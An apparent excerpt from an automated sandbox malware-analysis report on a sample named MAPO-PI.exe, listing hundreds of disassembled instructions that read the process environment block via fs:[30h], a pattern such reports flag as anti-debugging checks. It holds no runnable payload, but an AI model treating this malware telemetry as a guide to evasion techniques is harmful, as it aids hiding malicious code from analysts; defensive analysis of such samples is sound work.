          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01913884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01913884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01964015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01964015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01961074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01965BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01924257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01948DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0191A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01913540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01943D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
